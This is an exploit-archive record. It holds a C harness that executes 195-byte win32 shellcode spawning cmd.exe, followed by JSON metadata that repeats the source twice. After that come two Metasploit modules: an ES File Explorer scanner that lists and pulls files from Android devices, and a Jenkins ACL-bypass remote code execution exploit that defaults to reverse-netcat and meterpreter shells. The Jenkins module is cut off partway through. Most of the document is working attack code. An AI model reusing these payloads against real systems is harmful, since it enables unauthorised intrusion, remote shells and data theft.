ID 1337DAY-ID-12941
Type zdt
Reporter RubberDuck
Modified 2010-06-25T00:00:00
Description
Exploit for win32 platform in category shellcode
=========================================================
win32 WinExec cmd.exe + ExitProcess Shellcode - 195 bytes
=========================================================
/*
Title: Allwin WinExec cmd.exe + ExitProcess Shellcode - 195 bytes
Date: 2010-06-25
Author: RubberDuck
Web: http://bflow.security-portal.cz
Tested on: Win 2k, Win 2003, Win XP Home SP2/SP3 CZ/ENG (32), Win Vista (32)/(64), Win 7 (32)/(64), Win 2k8 (32)
Thanks to: kernelhunter, Lodus, Vrtule and others
*/
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
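/*
 * Test harness: prints the length of the byte string below, waits, and then
 * transfers control to those bytes.  The bytes are reproduced verbatim from
 * the author's listing; the title states they call WinExec on cmd.exe and
 * then ExitProcess, which this harness does not itself verify.
 *
 * Returns 0 only if control ever comes back from the called bytes; if they
 * do terminate the process as the title says, that line is never reached.
 */
int main(void){
    /* Author's byte string, unchanged.  Written as a string literal, so the
     * compiler appends one trailing NUL that is not part of the payload. */
    unsigned char shellcode[]=
    "\xFC\x33\xD2\xB2\x30\x64\xFF\x32\x5A\x8B"
    "\x52\x0C\x8B\x52\x14\x8B\x72\x28\x33\xC9"
    "\xB1\x18\x33\xFF\x33\xC0\xAC\x3C\x61\x7C"
    "\x02\x2C\x20\xC1\xCF\x0D\x03\xF8\xE2\xF0"
    "\x81\xFF\x5B\xBC\x4A\x6A\x8B\x5A\x10\x8B"
    "\x12\x75\xDA\x8B\x53\x3C\x03\xD3\xFF\x72"
    "\x34\x8B\x52\x78\x03\xD3\x8B\x72\x20\x03"
    "\xF3\x33\xC9\x41\xAD\x03\xC3\x81\x38\x47"
    "\x65\x74\x50\x75\xF4\x81\x78\x04\x72\x6F"
    "\x63\x41\x75\xEB\x81\x78\x08\x64\x64\x72"
    "\x65\x75\xE2\x49\x8B\x72\x24\x03\xF3\x66"
    "\x8B\x0C\x4E\x8B\x72\x1C\x03\xF3\x8B\x14"
    "\x8E\x03\xD3\x52\x68\x78\x65\x63\x01\xFE"
    "\x4C\x24\x03\x68\x57\x69\x6E\x45\x54\x53"
    "\xFF\xD2\x68\x63\x6D\x64\x01\xFE\x4C\x24"
    "\x03\x6A\x05\x33\xC9\x8D\x4C\x24\x04\x51"
    "\xFF\xD0\x68\x65\x73\x73\x01\x8B\xDF\xFE"
    "\x4C\x24\x03\x68\x50\x72\x6F\x63\x68\x45"
    "\x78\x69\x74\x54\xFF\x74\x24\x20\xFF\x54"
    "\x24\x20\x57\xFF\xD0";

    /* Length of the payload without the literal's trailing NUL.  sizeof is
     * used instead of strlen(): strlen() stops at the first 0x00 byte, so it
     * under-reports any binary blob that happens to contain one, and passing
     * an unsigned char array to it needs a cast.  %zu is the correct
     * conversion for size_t; the original "%d" was a type mismatch, which
     * printf() leaves undefined. */
    size_t payload_len = sizeof shellcode - 1;
    printf("Size = %zu\n", payload_len);

    /* Blocks until a key is pressed via cmd.exe's PAUSE builtin; on other
     * platforms the shell simply reports an unknown command and returns. */
    system("PAUSE");

    /* Converting an object pointer to a function pointer is not defined by
     * ISO C, and running code out of a writable stack buffer is exactly what
     * NX/DEP-style mitigations exist to block; whether this call executes at
     * all therefore depends on the build settings and the host's policy. */
    void (*entry)(void) = (void (*)(void))shellcode;
    entry();

    return 0;
}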
{"published": "2010-06-25T00:00:00", "id": "1337DAY-ID-12941", "cvss": {"score": 0.0, "vector": "NONE"}, "history": [{"differentElements": ["sourceHref", "sourceData", "href"], "edition": 1, "lastseen": "2016-04-20T02:14:06", "bulletin": {"published": "2010-06-25T00:00:00", "id": "1337DAY-ID-12941", "cvss": {"score": 0.0, "vector": "NONE"}, "history": [], "enchantments": {"score": {"value": 6.5, "modified": "2016-04-20T02:14:06"}}, "hash": "b3651c541924b6f5078ea6228bdcf648834f475de2d133fe78fd4cddd1899ef8", "description": "Exploit for win32 platform in category shellcode", "type": "zdt", "lastseen": "2016-04-20T02:14:06", "edition": 1, "title": "win32 WinExec cmd.exe + ExitProcess Shellcode - 195 bytes", "href": "http://0day.today/exploit/description/12941", "modified": "2010-06-25T00:00:00", "bulletinFamily": "exploit", "viewCount": 1, "cvelist": [], "sourceHref": "http://0day.today/exploit/12941", "references": [], "reporter": "RubberDuck", "sourceData": "=========================================================\r\nwin32 WinExec cmd.exe + ExitProcess Shellcode - 195 bytes\r\n=========================================================\r\n\r\n\r\n/*\r\nTitle: Allwin WinExec cmd.exe + ExitProcess Shellcode - 195 bytes\r\nDate: 2010-06-25\r\nAuthor: RubberDuck\r\nWeb: http://bflow.security-portal.cz\r\nTested on: Win 2k, Win 2003, Win XP Home SP2/SP3 CZ/ENG (32), Win Vista (32)/(64), Win 7 (32)/(64), Win 2k8 (32)\r\nThanks to: kernelhunter, Lodus, Vrtule and others\r\n*/\r\n \r\n#include <stdio.h>\r\n#include <string.h>\r\n#include <stdlib.h>\r\n \r\nint main(){\r\n unsigned char shellcode[]=\r\n \"\\xFC\\x33\\xD2\\xB2\\x30\\x64\\xFF\\x32\\x5A\\x8B\"\r\n \"\\x52\\x0C\\x8B\\x52\\x14\\x8B\\x72\\x28\\x33\\xC9\"\r\n \"\\xB1\\x18\\x33\\xFF\\x33\\xC0\\xAC\\x3C\\x61\\x7C\"\r\n \"\\x02\\x2C\\x20\\xC1\\xCF\\x0D\\x03\\xF8\\xE2\\xF0\"\r\n \"\\x81\\xFF\\x5B\\xBC\\x4A\\x6A\\x8B\\x5A\\x10\\x8B\"\r\n \"\\x12\\x75\\xDA\\x8B\\x53\\x3C\\x03\\xD3\\xFF\\x72\"\r\n 
\"\\x34\\x8B\\x52\\x78\\x03\\xD3\\x8B\\x72\\x20\\x03\"\r\n \"\\xF3\\x33\\xC9\\x41\\xAD\\x03\\xC3\\x81\\x38\\x47\"\r\n \"\\x65\\x74\\x50\\x75\\xF4\\x81\\x78\\x04\\x72\\x6F\"\r\n \"\\x63\\x41\\x75\\xEB\\x81\\x78\\x08\\x64\\x64\\x72\"\r\n \"\\x65\\x75\\xE2\\x49\\x8B\\x72\\x24\\x03\\xF3\\x66\"\r\n \"\\x8B\\x0C\\x4E\\x8B\\x72\\x1C\\x03\\xF3\\x8B\\x14\"\r\n \"\\x8E\\x03\\xD3\\x52\\x68\\x78\\x65\\x63\\x01\\xFE\"\r\n \"\\x4C\\x24\\x03\\x68\\x57\\x69\\x6E\\x45\\x54\\x53\"\r\n \"\\xFF\\xD2\\x68\\x63\\x6D\\x64\\x01\\xFE\\x4C\\x24\"\r\n \"\\x03\\x6A\\x05\\x33\\xC9\\x8D\\x4C\\x24\\x04\\x51\"\r\n \"\\xFF\\xD0\\x68\\x65\\x73\\x73\\x01\\x8B\\xDF\\xFE\"\r\n \"\\x4C\\x24\\x03\\x68\\x50\\x72\\x6F\\x63\\x68\\x45\"\r\n \"\\x78\\x69\\x74\\x54\\xFF\\x74\\x24\\x20\\xFF\\x54\"\r\n \"\\x24\\x20\\x57\\xFF\\xD0\";\r\n \r\n printf(\"Size = %d\\n\", strlen(shellcode));\r\n \r\n system(\"PAUSE\");\r\n \r\n ((void (*)())shellcode)();\r\n \r\n return 0;\r\n}\r\n\r\n\n\n# 0day.today [2016-04-20] #", "hashmap": [{"hash": "21cbaab14a471b75fed0f3376fc6c601", "key": "reporter"}, {"hash": "059379f5bd3536268e22ac6c72f403ae", "key": "title"}, {"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "99a37fedde2cb1d7914067eadece0338", "key": "description"}, {"hash": "2789576efabdaffaf9ed9daf1c1471a8", "key": "sourceData"}, {"hash": "7fbfab5de2bfc33801e25e9ac7810afa", "key": "modified"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "5a4c063d45e3eded25425ad6261389c3", "key": "href"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "7c6eafad7dd7e7ad776b284eb9fb9df3", "key": "sourceHref"}, {"hash": "7fbfab5de2bfc33801e25e9ac7810afa", "key": "published"}], "objectVersion": "1.0"}}], "description": "Exploit for win32 platform in category shellcode", "hash": 
"44af90efccb3f26e2a64f767bc8dda42b0b7cfee0a095c5aaa302e5668feb3b0", "enchantments": {"score": {"value": 0.1, "vector": "NONE", "modified": "2018-01-02T23:01:59"}, "dependencies": {"references": [{"type": "zdt", "idList": ["1337DAY-ID-27076", "1337DAY-ID-21026", "1337DAY-ID-2560"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:29662", "SECURITYVULNS:VULN:12941", "SECURITYVULNS:DOC:15499", "SECURITYVULNS:VULN:6213"]}, {"type": "exploitdb", "idList": ["EDB-ID:27076"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:122521"]}], "modified": "2018-01-02T23:01:59"}, "vulnersScore": 0.1}, "type": "zdt", "lastseen": "2018-01-02T23:01:59", "edition": 2, "title": "win32 WinExec cmd.exe + ExitProcess Shellcode - 195 bytes", "href": "https://0day.today/exploit/description/12941", "modified": "2010-06-25T00:00:00", "bulletinFamily": "exploit", "viewCount": 4, "cvelist": [], "sourceHref": "https://0day.today/exploit/12941", "references": [], "reporter": "RubberDuck", "sourceData": "=========================================================\r\nwin32 WinExec cmd.exe + ExitProcess Shellcode - 195 bytes\r\n=========================================================\r\n\r\n\r\n/*\r\nTitle: Allwin WinExec cmd.exe + ExitProcess Shellcode - 195 bytes\r\nDate: 2010-06-25\r\nAuthor: RubberDuck\r\nWeb: http://bflow.security-portal.cz\r\nTested on: Win 2k, Win 2003, Win XP Home SP2/SP3 CZ/ENG (32), Win Vista (32)/(64), Win 7 (32)/(64), Win 2k8 (32)\r\nThanks to: kernelhunter, Lodus, Vrtule and others\r\n*/\r\n \r\n#include <stdio.h>\r\n#include <string.h>\r\n#include <stdlib.h>\r\n \r\nint main(){\r\n unsigned char shellcode[]=\r\n \"\\xFC\\x33\\xD2\\xB2\\x30\\x64\\xFF\\x32\\x5A\\x8B\"\r\n \"\\x52\\x0C\\x8B\\x52\\x14\\x8B\\x72\\x28\\x33\\xC9\"\r\n \"\\xB1\\x18\\x33\\xFF\\x33\\xC0\\xAC\\x3C\\x61\\x7C\"\r\n \"\\x02\\x2C\\x20\\xC1\\xCF\\x0D\\x03\\xF8\\xE2\\xF0\"\r\n \"\\x81\\xFF\\x5B\\xBC\\x4A\\x6A\\x8B\\x5A\\x10\\x8B\"\r\n \"\\x12\\x75\\xDA\\x8B\\x53\\x3C\\x03\\xD3\\xFF\\x72\"\r\n 
\"\\x34\\x8B\\x52\\x78\\x03\\xD3\\x8B\\x72\\x20\\x03\"\r\n \"\\xF3\\x33\\xC9\\x41\\xAD\\x03\\xC3\\x81\\x38\\x47\"\r\n \"\\x65\\x74\\x50\\x75\\xF4\\x81\\x78\\x04\\x72\\x6F\"\r\n \"\\x63\\x41\\x75\\xEB\\x81\\x78\\x08\\x64\\x64\\x72\"\r\n \"\\x65\\x75\\xE2\\x49\\x8B\\x72\\x24\\x03\\xF3\\x66\"\r\n \"\\x8B\\x0C\\x4E\\x8B\\x72\\x1C\\x03\\xF3\\x8B\\x14\"\r\n \"\\x8E\\x03\\xD3\\x52\\x68\\x78\\x65\\x63\\x01\\xFE\"\r\n \"\\x4C\\x24\\x03\\x68\\x57\\x69\\x6E\\x45\\x54\\x53\"\r\n \"\\xFF\\xD2\\x68\\x63\\x6D\\x64\\x01\\xFE\\x4C\\x24\"\r\n \"\\x03\\x6A\\x05\\x33\\xC9\\x8D\\x4C\\x24\\x04\\x51\"\r\n \"\\xFF\\xD0\\x68\\x65\\x73\\x73\\x01\\x8B\\xDF\\xFE\"\r\n \"\\x4C\\x24\\x03\\x68\\x50\\x72\\x6F\\x63\\x68\\x45\"\r\n \"\\x78\\x69\\x74\\x54\\xFF\\x74\\x24\\x20\\xFF\\x54\"\r\n \"\\x24\\x20\\x57\\xFF\\xD0\";\r\n \r\n printf(\"Size = %d\\n\", strlen(shellcode));\r\n \r\n system(\"PAUSE\");\r\n \r\n ((void (*)())shellcode)();\r\n \r\n return 0;\r\n}\r\n\r\n\n\n# 0day.today [2018-01-02] #", "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "99a37fedde2cb1d7914067eadece0338", "key": "description"}, {"hash": "069e2c9d0aa376fb8497858c8f2f6289", "key": "href"}, {"hash": "7fbfab5de2bfc33801e25e9ac7810afa", "key": "modified"}, {"hash": "7fbfab5de2bfc33801e25e9ac7810afa", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "21cbaab14a471b75fed0f3376fc6c601", "key": "reporter"}, {"hash": "b3d77d5d38c36511954eceb34105732f", "key": "sourceData"}, {"hash": "35e8c158d698693a632a8413db486fc8", "key": "sourceHref"}, {"hash": "059379f5bd3536268e22ac6c72f403ae", "key": "title"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}], "objectVersion": "1.3"}
{"metasploit": [{"lastseen": "2019-11-20T16:26:16", "bulletinFamily": "exploit", "description": "This module connects to ES File Explorer's HTTP server to run certain commands. The HTTP server is started on app launch, and is available as long as the app is open. Version 4.1.9.7.4 and below are reported vulnerable This module has been tested against 4.1.9.5.1.\n", "modified": "2019-03-26T23:39:17", "published": "2019-03-24T12:01:32", "id": "MSF:AUXILIARY/SCANNER/HTTP/ES_FILE_EXPLORER_OPEN_PORT", "href": "", "type": "metasploit", "title": "ES File Explorer Open Port", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpClient\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n\n def initialize\n super(\n 'Name' => 'ES File Explorer Open Port',\n 'Description' => %q{\n This module connects to ES File Explorer's HTTP server to run\n certain commands. The HTTP server is started on app launch, and is available\n as long as the app is open. 
Version 4.1.9.7.4 and below are reported vulnerable\n This module has been tested against 4.1.9.5.1.\n },\n 'References' =>\n [\n ['CVE', '2019-6447'],\n ['URL', 'https://www.ms509.com/2016/03/01/es-explorer-vul/'],\n ['URL', 'https://github.com/fs0c131y/ESFileExplorerOpenPortVuln'],\n ['URL', 'https://twitter.com/fs0c131y/status/1085460755313508352'],\n ],\n 'Author' => [\n '\u5c0f\u8377\u624d\u9732\u5c16\u5c16\u89d2', # discovery (2016)\n 'moonbocal', # discovery (2019)\n 'fs0c131y', # poc\n 'h00die' # msf module\n ],\n 'DisclosureDate' => 'Jan 16 2019',\n 'License' => MSF_LICENSE,\n 'Actions' => [\n ['LISTFILES', {'Description' => 'List all the files on the sdcard'}],\n ['LISTPICS', {'Description' => 'List all the pictures'}],\n ['LISTVIDEOS', {'Description' => 'List all the videos'}],\n ['LISTAUDIOS', {'Description' => 'List all the audio files'}],\n ['LISTAPPS', {'Description' => 'List all the apps installed'}],\n ['LISTAPPSSYSTEM', {'Description' => 'List all the system apps installed'}],\n ['LISTAPPSPHONE', {'Description' => 'List all the phone apps installed'}],\n ['LISTAPPSSDCARD', {'Description' => 'List all the apk files stored on the sdcard'}],\n ['LISTAPPSALL', {'Description' => 'List all the apps installed'}],\n ['GETDEVICEINFO', {'Description' => 'Get device info'}],\n ['GETFILE', {'Description' => 'Get a file from the device. ACTIONITEM required.'}],\n ['APPLAUNCH', {'Description' => 'Launch an app. 
ACTIONITEM required.'}],\n ],\n 'DefaultAction' => 'GETDEVICEINFO',\n )\n\n register_options([\n Opt::RPORT(59777),\n OptString.new('ACTIONITEM', [false,'If an app or filename if required by the action']),\n ])\n\n end\n\n def sanitize_json(j)\n j.gsub!(\"},\\r\\n]\", \"}]\")\n j.gsub!(\"'\", '\"')\n return j.gsub('\", }', '\"}')\n end\n\n def http_post(command)\n send_request_raw(\n 'uri' => '/',\n 'method' => 'POST',\n 'data' => \"{ \\\"command\\\":#{command} }\",\n 'ctype' => 'application/json',\n )\n end\n\n def run_host(target_host)\n case\n when action.name == 'LISTFILES'\n res = http_post('listFiles')\n unless res\n print_error(\"#{peer}- Error Connecting\")\n return\n end\n unless res.code == 200\n print_error(\"#{peer}- Not Vulnerable or Bad Response\")\n return\n end\n path = store_loot('listFiles.json', 'application/json', target_host, res.body, 'es_file_explorer_listfiles.json')\n vprint_good(\"#{peer}- Result saved to #{path}\")\n json_resp = JSON.parse(sanitize_json(res.body))\n pretty_response = \"#{peer}\\n\"\n json_resp.each do |f|\n pretty_response << \" #{f['type']}: #{f['name']} (#{f['size'].split(' (')[0]}) - #{f['time']}\\n\"\n end\n print_good(pretty_response)\n when action.name == 'LISTPICS'\n res = http_post('listPics')\n unless res\n print_error(\"#{peer}- Error Connecting\")\n return\n end\n unless res.code == 200\n print_error(\"#{peer}- Not Vulnerable or Bad Response\")\n return\n end\n path = store_loot('listPics.json', 'application/json', target_host, res.body, 'es_file_explorer_listpics.json')\n vprint_good(\"#{peer}- Result saved to #{path}\")\n json_resp = JSON.parse(sanitize_json(res.body))\n pretty_response = \"#{peer}\\n\"\n json_resp.each do |f|\n pretty_response << \" #{f['name']} (#{f['size'].split(' (')[0]}) - #{f['time']}: #{f['location']}\\n\"\n end\n print_good(pretty_response)\n when action.name == 'LISTVIDEOS'\n res = http_post('listVideos')\n unless res\n print_error(\"#{peer}- Error Connecting\")\n return\n end\n 
unless res.code == 200\n print_error(\"#{peer}- Not Vulnerable or Bad Response\")\n return\n end\n path = store_loot('listVideos.json', 'application/json', target_host, res.body, 'es_file_explorer_listvideos.json')\n vprint_good(\"#{peer}- Result saved to #{path}\")\n json_resp = JSON.parse(sanitize_json(res.body))\n pretty_response = \"#{peer}\\n\"\n json_resp.each do |f|\n pretty_response << \" #{f['name']} (#{f['size'].split(' (')[0]}) - #{f['time']}: #{f['location']}\\n\"\n end\n print_good(pretty_response)\n when action.name == 'LISTAUDIOS'\n res = http_post('listAudios')\n unless res\n print_error(\"#{peer}- Error Connecting\")\n return\n end\n unless res.code == 200\n print_error(\"#{peer}- Not Vulnerable or Bad Response\")\n return\n end\n path = store_loot('listAudio.json', 'application/json', target_host, res.body, 'es_file_explorer_listaudio.json')\n vprint_good(\"#{peer}- Result saved to #{path}\")\n json_resp = JSON.parse(sanitize_json(res.body))\n pretty_response = \"#{peer}\\n\"\n json_resp.each do |f|\n pretty_response << \" #{f['name']} (#{f['size'].split(' (')[0]}) - #{f['time']}: #{f['location']}\\n\"\n end\n print_good(pretty_response)\n when action.name == 'LISTAPPS'\n res = http_post('listApps')\n unless res\n print_error(\"#{peer}- Error Connecting\")\n return\n end\n unless res.code == 200\n print_error(\"#{peer}- Not Vulnerable or Bad Response\")\n return\n end\n path = store_loot('listApps.json', 'application/json', target_host, res.body, 'es_file_explorer_listapps.json')\n vprint_good(\"#{peer}- Result saved to #{path}\")\n json_resp = JSON.parse(sanitize_json(res.body))\n pretty_response = \"#{peer}\\n\"\n json_resp.each do |f|\n pretty_response << \" #{f['label']} (#{f['packageName']}) Version: #{f['version']}\\n\"\n end\n print_good(pretty_response)\n when action.name == 'LISTAPPSSYSTEM'\n res = http_post('listAppsSystem')\n unless res\n print_error(\"#{peer}- Error Connecting\")\n return\n end\n unless res.code == 200\n 
print_error(\"#{peer}- Not Vulnerable or Bad Response\")\n return\n end\n path = store_loot('listAppsSystem.json', 'application/json', target_host, res.body, 'es_file_explorer_listappssystem.json')\n vprint_good(\"#{peer}- Result saved to #{path}\")\n json_resp = JSON.parse(sanitize_json(res.body))\n pretty_response = \"#{peer}\\n\"\n json_resp.each do |f|\n pretty_response << \" #{f['label']} (#{f['packageName']}) Version: #{f['version']}\\n\"\n end\n print_good(pretty_response)\n when action.name == 'LISTAPPSPHONE'\n res = http_post('listAppsPhone')\n unless res\n print_error(\"#{peer}- Error Connecting\")\n return\n end\n unless res.code == 200\n print_error(\"#{peer}- Not Vulnerable or Bad Response\")\n return\n end\n path = store_loot('listAppsPhone.json', 'application/json', target_host, res.body, 'es_file_explorer_listappsphone.json')\n vprint_good(\"#{peer}- Result saved to #{path}\")\n json_resp = JSON.parse(sanitize_json(res.body))\n pretty_response = \"#{peer}\\n\"\n json_resp.each do |f|\n pretty_response << \" #{f['label']} (#{f['packageName']}) Version: #{f['version']}\\n\"\n end\n print_good(pretty_response)\n when action.name == 'LISTAPPSSDCARD'\n res = http_post('listAppsSdcard')\n unless res\n print_error(\"#{peer}- Error Connecting\")\n return\n end\n unless res.code == 200\n print_error(\"#{peer}- Not Vulnerable or Bad Response\")\n return\n end\n path = store_loot('listAppsSdcard.json', 'application/json', target_host, res.body, 'es_file_explorer_listappssdcard.json')\n vprint_good(\"#{peer}- Result saved to #{path}\")\n json_resp = JSON.parse(sanitize_json(res.body))\n pretty_response = \"#{peer}\\n\"\n json_resp.each do |f|\n pretty_response << \" #{f['label']} (#{f['packageName']}) Version: #{f['version']}\\n\"\n end\n print_good(pretty_response)\n when action.name == 'LISTAPPSALL'\n res = http_post('listAppsAll')\n unless res\n print_error(\"#{peer}- Error Connecting\")\n return\n end\n unless res.code == 200\n print_error(\"#{peer}- Not 
Vulnerable or Bad Response\")\n return\n end\n path = store_loot('listAppsAll.json', 'application/json', target_host, res.body, 'es_file_explorer_listappsall.json')\n vprint_good(\"#{peer}- Result saved to #{path}\")\n json_resp = JSON.parse(sanitize_json(res.body))\n pretty_response = \"#{peer}\\n\"\n json_resp.each do |f|\n pretty_response << \" #{f['label']} (#{f['packageName']}) Version: #{f['version']}\\n\"\n end\n print_good(pretty_response)\n when action.name == 'GETDEVICEINFO'\n res = http_post('getDeviceInfo')\n unless res\n print_error(\"#{peer}- Error Connecting\")\n return\n end\n unless res.code == 200\n print_error(\"#{peer}- Not Vulnerable or Bad Response\")\n return\n end\n path = store_loot('getDeviceInfo.json', 'application/json', target_host, res.body, 'es_file_explorer_getdeviceinfo.json')\n vprint_good(\"#{peer}- Result saved to #{path}\")\n json_resp = JSON.parse(sanitize_json(res.body))\n print_good(\"#{peer}- Name: #{json_resp['name']}\")\n when action.name == 'GETFILE'\n unless datastore['ACTIONITEM'].start_with?('/')\n print_error('Action item is a path for GETFILE, like /system/app/Browser.apk')\n end\n res = send_request_raw(\n 'uri' => datastore['ACTIONITEM'],\n 'method' => 'GET',\n 'ctype' => 'application/json',\n )\n unless res\n print_error(\"#{peer}- Error Connecting\")\n return\n end\n unless res.code == 200\n print_error(\"#{peer}- Not Vulnerable, Bad Response. 
File may not be available for download.\")\n return\n end\n path = store_loot('getFile', 'application/octet-stream', target_host, res.body, datastore['ACTIONITEM'])\n print_good(\"#{peer}- #{datastore['ACTIONITEM']} saved to #{path}\")\n when action.name == 'APPLAUNCH'\n if datastore['ACTIONITEM'].empty?\n print_error('Action item is a path for GETFILE, like com.android.chrome')\n end\n res = send_request_raw(\n 'uri' => '/',\n 'method' => 'POST',\n 'data' => \"{ \\\"command\\\":appLaunch, \\\"appPackageName\\\":#{datastore['ACTIONITEM']} }\",\n 'ctype' => 'application/json',\n )\n unless res\n print_error(\"#{peer}- Error Connecting\")\n return\n end\n unless res.code == 200\n print_error(\"#{peer}- Not Vulnerable, Bad Response. File may not be available for download.\")\n return\n end\n if res.body.include?('NameNotFoundException')\n print_error(\"#{peer}- Application #{datastore['ACTIONITEM']} not found on device\")\n return\n elsif res.body.include?('{\"result\":\"0\"}')\n print_good(\"#{peer}- #{datastore['actionitem']} launched successfully\")\n end\n end\n end\nend\n", "cvss": {"score": 4.8, "vector": "AV:A/AC:L/Au:N/C:P/I:P/A:N"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/http/es_file_explorer_open_port.rb"}, {"lastseen": "2019-11-20T16:26:17", "bulletinFamily": "exploit", "description": "This module exploits a vulnerability in Jenkins dynamic routing to bypass the Overall/Read ACL and leverage Groovy metaprogramming to download and execute a malicious JAR file. When the \"Java Dropper\" target is selected, the original entry point based on classLoader.parseClass is used, which requires the use of Groovy metaprogramming to achieve RCE. When the \"Unix In-Memory\" target is selected, a newer, higher-level, and more universal entry point based on GroovyShell.parse is used. This permits the use of in-memory arbitrary command execution. 
The ACL bypass gadget is specific to Jenkins <= 2.137 and will not work on later versions of Jenkins. Tested against Jenkins 2.137 and Pipeline: Groovy Plugin 2.61.\n", "modified": "2019-05-30T05:06:10", "published": "2019-02-23T07:34:27", "id": "MSF:EXPLOIT/MULTI/HTTP/JENKINS_METAPROGRAMMING", "href": "", "type": "metasploit", "title": "Jenkins ACL Bypass and Metaprogramming RCE", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::Remote::HttpServer\n include Msf::Exploit::FileDropper\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Jenkins ACL Bypass and Metaprogramming RCE',\n 'Description' => %q{\n This module exploits a vulnerability in Jenkins dynamic routing to\n bypass the Overall/Read ACL and leverage Groovy metaprogramming to\n download and execute a malicious JAR file.\n\n When the \"Java Dropper\" target is selected, the original entry point\n based on classLoader.parseClass is used, which requires the use of\n Groovy metaprogramming to achieve RCE.\n\n When the \"Unix In-Memory\" target is selected, a newer, higher-level,\n and more universal entry point based on GroovyShell.parse is used.\n This permits the use of in-memory arbitrary command execution.\n\n The ACL bypass gadget is specific to Jenkins <= 2.137 and will not work\n on later versions of Jenkins.\n\n Tested against Jenkins 2.137 and Pipeline: Groovy Plugin 2.61.\n },\n 'Author' => [\n 'Orange Tsai', # (@orange_8361) Discovery and PoC\n 'Mikhail Egorov', # (@0ang3el) Discovery and PoC\n 'George Noseevich', # (@webpentest) Discovery and PoC\n 'wvu' # Metasploit module\n ],\n 'References' => [\n ['CVE', '2018-1000861'], # Orange Tsai\n ['CVE', '2019-1003000'], # Script Security\n ['CVE', '2019-1003001'], # Pipeline: Groovy\n 
['CVE', '2019-1003002'], # Pipeline: Declarative\n ['CVE', '2019-1003005'], # Mikhail Egorov\n ['CVE', '2019-1003029'], # George Noseevich\n ['EDB', '46427'],\n ['URL', 'https://jenkins.io/security/advisory/2019-01-08/'],\n ['URL', 'https://blog.orange.tw/2019/01/hacking-jenkins-part-1-play-with-dynamic-routing.html'],\n ['URL', 'https://blog.orange.tw/2019/02/abusing-meta-programming-for-unauthenticated-rce.html'],\n ['URL', 'https://github.com/adamyordan/cve-2019-1003000-jenkins-rce-poc'],\n ['URL', 'https://twitter.com/orange_8361/status/1126829648552312832'],\n ['URL', 'https://github.com/orangetw/awesome-jenkins-rce-2019']\n ],\n 'DisclosureDate' => '2019-01-08', # Public disclosure\n 'License' => MSF_LICENSE,\n 'Platform' => ['unix', 'java'],\n 'Arch' => [ARCH_CMD, ARCH_JAVA],\n 'Privileged' => false,\n 'Targets' => [\n ['Unix In-Memory',\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Version' => Gem::Version.new('2.137'),\n 'Type' => :unix_memory,\n 'DefaultOptions' => {'PAYLOAD' => 'cmd/unix/reverse_netcat'}\n ],\n ['Java Dropper',\n 'Platform' => 'java',\n 'Arch' => ARCH_JAVA,\n 'Version' => Gem::Version.new('2.137'),\n 'Type' => :java_dropper,\n 'DefaultOptions' => {'PAYLOAD' => 'java/meterpreter/reverse_https'}\n ]\n ],\n 'DefaultTarget' => 1,\n 'Notes' => {\n 'Stability' => [CRASH_SAFE],\n 'Reliability' => [REPEATABLE_SESSION],\n 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]\n },\n 'Stance' => Stance::Aggressive\n ))\n\n register_options([\n Opt::RPORT(8080),\n OptString.new('TARGETURI', [true, 'Base path to Jenkins', '/'])\n ])\n\n register_advanced_options([\n OptBool.new('ForceExploit', [false, 'Override check result', false])\n ])\n\n deregister_options('URIPATH')\n end\n\n=begin\n http://jenkins.local/securityRealm/user/admin/search/index?q=[keyword]\n=end\n def check\n checkcode = CheckCode::Safe\n\n res = send_request_cgi(\n 'method' => 'GET',\n 'uri' => go_go_gadget1('/search/index'),\n 'vars_get' => {'q' => 'a'}\n )\n\n unless res && 
(version = res.headers['X-Jenkins'])\n vprint_error('Jenkins version not detected')\n return CheckCode::Unknown\n end\n\n vprint_status(\"Jenkins #{version} detected\")\n checkcode = CheckCode::Detected\n\n if Gem::Version.new(version) > target['Version']\n vprint_error(\"Jenkins #{version} is not a supported target\")\n return CheckCode::Safe\n end\n\n vprint_good(\"Jenkins #{version} is a supported target\")\n checkcode = CheckCode::Appears\n\n if res.body.include?('Administrator')\n vprint_good('ACL bypass successful')\n checkcode = CheckCode::Vulnerable\n else\n vprint_error('ACL bypass unsuccessful')\n return CheckCode::Safe\n end\n\n checkcode\n end\n\n def exploit\n unless check == CheckCode::Vulnerable || datastore['ForceExploit']\n fail_with(Failure::NotVulnerable, 'Set ForceExploit to override')\n end\n\n print_status(\"Configuring #{target.name} target\")\n\n vars_get = {'value' => go_go_gadget2}\n\n case target['Type']\n when :unix_memory\n vars_get = {'sandbox' => true}.merge(vars_get)\n when :java_dropper\n # NOTE: Ivy is using HTTP unconditionally, so we can't use HTTPS\n # HACK: Both HttpClient and HttpServer use datastore['SSL']\n ssl = datastore['SSL']\n datastore['SSL'] = false\n start_service('Path' => '/')\n datastore['SSL'] = ssl\n end\n\n print_status('Sending Jenkins and Groovy 